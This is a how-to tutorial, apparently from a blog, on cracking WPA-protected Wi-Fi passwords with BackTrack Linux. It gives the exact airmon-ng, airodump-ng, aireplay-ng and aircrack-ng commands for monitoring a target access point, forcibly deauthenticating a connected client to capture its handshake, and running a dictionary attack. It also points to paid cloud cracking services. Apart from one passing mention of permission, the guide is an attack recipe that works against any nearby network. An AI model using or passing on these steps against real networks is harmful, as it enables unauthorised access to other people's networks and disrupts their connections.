Introduction
Cracking WPA is not nearly as easy as cracking WEP. I will forego a lengthy encryption explanation and just say the primary difference is that WEP can be deduced from capturing many packets, but WPA has to be checked against a dictionary file. If it’s not in the dictionary, then it will not be recognized. It will take time and may yield no results.
The positive side is that WPA is considered an ‘offline’ attack, meaning, you capture a single handshake packet and do everything else later. The convenience factor is that you can capture someone’s handshake packet (with their permission, of course) with your laptop and go home and run the crack on your desktop for more power.
Since I usually find that there’s generally too much explanation involved in these tutorials, I will attempt to keep it simple.
Required Items
- A Wireless Router with WPA encryption
- A Wireless Card Capable of Injection (I prefer Atheros Cards)
- A Copy of BackTrack Linux
- A USB Key (2GB or larger) or DVD Burner
The Steps
First, you need BackTrack on a DVD or USB Key. If using a DVD, use your own software, but if you’re using a USB Key, please follow these instructions.
Preparing your USB Key for Booting with backtrack
First, plug your USB Key into your computer and format it with FAT32.
Download and run UNetbootin.
Select “Diskimage” and point Unetbootin to the location of your BackTrack ISO file, then make sure the proper drive letter to your USB drive is selected.
Click OK and wait for UNetbootin to finish copying files to the USB Key.
When complete, you can click “Reboot Now” or “Exit” to finish.
Booting to backtrack
Restart your computer with the disc or USB Key in and press your computer’s boot selection button. Probably either F2 or F12.
Once you’re at the prompt, type:
root@bt:~#startx
This will place you into the X Windows environment and make it easier to run multiple shell windows.
Let’s Get Started – Capturing the Handshake
Open a terminal.
Let’s set the card in monitor mode:
airmon-ng start wlan0
and look for our target AP:
airodump-ng mon0
We have the info we need, now let’s focus on just our target AP:
airodump-ng -c (chan) -w (capfile) --bssid (apmac) (iface)
Mine:
airodump-ng -c 5 -w wpa.cap --bssid 0A:15:6D:E8:A8:78 mon0
Now notice there’s a client connected right now, we need that client. Why do we need a client? Because we need to send a deauth command in order to catch the ‘handshake’ when he reconnects.
Open a second terminal window and use the following command to de-authenticate the client:
aireplay-ng -0 1 -a (apmac) -c (clientmac) (iface)
Mine:
aireplay-ng -0 1 -a 0A:15:6D:E8:A8:78 -c 00:1A:73:50:61:DD mon0
The client de-authenticated and reconnected. You should know have the handshake in your cap file. If your screen says WPA Handshake like the one below, you’re good to go!
Success! You may now close both of these terminal windows. We have the handshake we need and can start the cracking.
Cracking – the hard part
So we have our capture and now we’re ready to start cracking the password. Remember that this could take a long time and may not complete at all!
I have prepared the following dictionary file for use with WPA cracking, please download it: REMOVED: Please See This Post.
It’s not a very good wordlist, but it will do.
Let’s do this:
aircrack-ng -w wpalist.txt -b (BSSID) (capfile)
Mine:
aircrack-ng -w wpalist.txt -b 0A:15:6D:E8:A8:78 wpa.cap
There go! Our password is cracked and in almost 16 minutes. Your success may vary and, as I said before, you may not crack it at all.
You could look elsewhere for a larger dictionary file to use. If you REALLY want the password cracked, there are online places with clouds that will let you crack passwords, but they all charge money.
Thanks for reading!
